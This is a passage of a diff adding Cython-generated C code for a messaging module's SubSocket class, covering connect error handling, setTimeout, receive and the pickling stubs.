MultiplePublishersError(endpoint) + */ + __pyx_t_1 = (__pyx_v_r != 0); + if (__pyx_t_1) { + + /* "cereal/messaging/messaging_pyx.pyx":190 + * + * if r != 0: + * if errno.errno == errno.EADDRINUSE: # <<<<<<<<<<<<<< + * raise MultiplePublishersError(endpoint) + * else: + */ + __pyx_t_1 = (errno == EADDRINUSE); + if (unlikely(__pyx_t_1)) { + + /* "cereal/messaging/messaging_pyx.pyx":191 + * if r != 0: + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError(endpoint) # <<<<<<<<<<<<<< + * else: + * raise MessagingError(endpoint) + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_MultiplePublishersError); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 191, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_endpoint); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 191, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_4}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 191, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 191, __pyx_L1_error) + + /* "cereal/messaging/messaging_pyx.pyx":190 + * + * if r != 0: + * if errno.errno == errno.EADDRINUSE: # <<<<<<<<<<<<<< + * raise MultiplePublishersError(endpoint) + * else: + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":193 + * raise MultiplePublishersError(endpoint) + * else: + * raise MessagingError(endpoint) # <<<<<<<<<<<<<< + * + * def setTimeout(self, int timeout): + */ + /*else*/ { + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_MessagingError); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 193, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_endpoint); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 193, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_4}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 193, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 193, __pyx_L1_error) + } + + /* "cereal/messaging/messaging_pyx.pyx":189 + * r = self.socket.connect(context.context, endpoint, address, conflate) + * + * if r != 0: # <<<<<<<<<<<<<< + * if errno.errno == errno.EADDRINUSE: + * raise MultiplePublishersError(endpoint) + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":186 + * self.socket = ptr + * + * def connect(self, Context context, string endpoint, string address=b"127.0.0.1", bool conflate=False): # <<<<<<<<<<<<<< + * r = self.socket.connect(context.context, endpoint, address, conflate) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.connect", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":195 + * raise MessagingError(endpoint) + * + * def setTimeout(self, int timeout): # <<<<<<<<<<<<<< + * self.socket.setTimeout(timeout) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_7setTimeout(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_7setTimeout = {"setTimeout", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_7setTimeout, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_7setTimeout(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_timeout; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("setTimeout (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_timeout,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_timeout)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 195, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "setTimeout") < 0)) __PYX_ERR(0, 195, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_timeout = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_timeout == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 195, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("setTimeout", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 195, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.setTimeout", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_6setTimeout(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self), __pyx_v_timeout); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_6setTimeout(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, int __pyx_v_timeout) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("setTimeout", 0); + + /* "cereal/messaging/messaging_pyx.pyx":196 + * + * def setTimeout(self, int timeout): + * self.socket.setTimeout(timeout) # <<<<<<<<<<<<<< + * + * def receive(self, bool non_blocking=False): + */ + __pyx_v_self->socket->setTimeout(__pyx_v_timeout); + + /* "cereal/messaging/messaging_pyx.pyx":195 + * raise MessagingError(endpoint) + * + * def setTimeout(self, int timeout): # <<<<<<<<<<<<<< + * self.socket.setTimeout(timeout) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":198 + * self.socket.setTimeout(timeout) + * + * def receive(self, bool non_blocking=False): # <<<<<<<<<<<<<< + * msg = self.socket.receive(non_blocking) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_9receive(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_9receive = {"receive", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_9receive, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_9receive(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + bool __pyx_v_non_blocking; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("receive (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_non_blocking,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_non_blocking); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 198, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "receive") < 0)) __PYX_ERR(0, 198, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + if (values[0]) { + __pyx_v_non_blocking = __Pyx_PyObject_IsTrue(values[0]); if (unlikely((__pyx_v_non_blocking == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 198, __pyx_L3_error) + } else { + __pyx_v_non_blocking = ((bool)0); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("receive", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 198, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.receive", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_8receive(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self), __pyx_v_non_blocking); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_8receive(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, bool __pyx_v_non_blocking) { + Message *__pyx_v_msg; + size_t __pyx_v_sz; + PyObject *__pyx_v_m = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("receive", 0); + + /* "cereal/messaging/messaging_pyx.pyx":199 + * + * def receive(self, bool non_blocking=False): + * msg = self.socket.receive(non_blocking) # <<<<<<<<<<<<<< + * + * if msg == NULL: + */ + __pyx_v_msg = __pyx_v_self->socket->receive(__pyx_v_non_blocking); + + /* "cereal/messaging/messaging_pyx.pyx":201 + * msg = self.socket.receive(non_blocking) + * + * if msg == NULL: # <<<<<<<<<<<<<< + * # If a blocking read returns no message check errno if SIGINT was caught in the C++ code + * if errno.errno == errno.EINTR: + */ + __pyx_t_1 = (__pyx_v_msg == NULL); + if (__pyx_t_1) { + + /* "cereal/messaging/messaging_pyx.pyx":203 + * if msg == NULL: + * # If a blocking read returns no message check errno if SIGINT was caught in the C++ code + * if errno.errno == errno.EINTR: # <<<<<<<<<<<<<< + * print("SIGINT received, exiting") + * sys.exit(1) + */ + __pyx_t_1 = (errno == EINTR); + if (__pyx_t_1) { + + /* "cereal/messaging/messaging_pyx.pyx":204 + * # If a blocking read returns no message check errno if SIGINT was caught in the C++ code + * if errno.errno == errno.EINTR: + * print("SIGINT received, exiting") # <<<<<<<<<<<<<< + * sys.exit(1) + * + */ + __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_print, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 204, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":205 + * if errno.errno == errno.EINTR: + * print("SIGINT received, exiting") + * sys.exit(1) # <<<<<<<<<<<<<< + * + * return None + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sys); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 205, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_exit); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 205, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_int_1}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 205, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":203 + * if msg == NULL: + * # If a blocking read returns no message check errno if SIGINT was caught in the C++ code + * if errno.errno == errno.EINTR: # <<<<<<<<<<<<<< + * print("SIGINT received, exiting") + * sys.exit(1) + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":207 + * sys.exit(1) + * + * return None # <<<<<<<<<<<<<< + * else: + * sz = msg.getSize() + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "cereal/messaging/messaging_pyx.pyx":201 + * msg = self.socket.receive(non_blocking) + * + * if msg == NULL: # <<<<<<<<<<<<<< + * # If a blocking read returns no message check errno if SIGINT was caught in the C++ code + * if errno.errno == errno.EINTR: + */ + } + + /* "cereal/messaging/messaging_pyx.pyx":209 + * return None + * else: + * sz = msg.getSize() # <<<<<<<<<<<<<< + * m = msg.getData()[:sz] + * del msg + */ + /*else*/ { + __pyx_v_sz = __pyx_v_msg->getSize(); + + /* "cereal/messaging/messaging_pyx.pyx":210 + * else: + * sz = msg.getSize() + * m = msg.getData()[:sz] # <<<<<<<<<<<<<< + * del msg + * + */ + __pyx_t_2 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_msg->getData() + 0, __pyx_v_sz - 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 210, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_v_m = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "cereal/messaging/messaging_pyx.pyx":211 + * sz = msg.getSize() + * m = msg.getData()[:sz] + * del msg # <<<<<<<<<<<<<< + * + * return m + */ + delete __pyx_v_msg; + + /* "cereal/messaging/messaging_pyx.pyx":213 + * del msg + * + * return m # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_m); + __pyx_r = __pyx_v_m; + goto __pyx_L0; + } + + /* "cereal/messaging/messaging_pyx.pyx":198 + * self.socket.setTimeout(timeout) + * + * def receive(self, bool non_blocking=False): # <<<<<<<<<<<<<< + * msg = self.socket.receive(non_blocking) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.receive", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_m); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_11__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_11__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_11__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_11__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_10__reduce_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_10__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_13__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9SubSocket_13__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_13__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9SubSocket_13__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_12__setstate_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9SubSocket_12__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SubSocket *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.SubSocket.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "cereal/messaging/messaging_pyx.pyx":219 + * cdef cppPubSocket * socket + * + * def __cinit__(self): # <<<<<<<<<<<<<< + * self.socket = 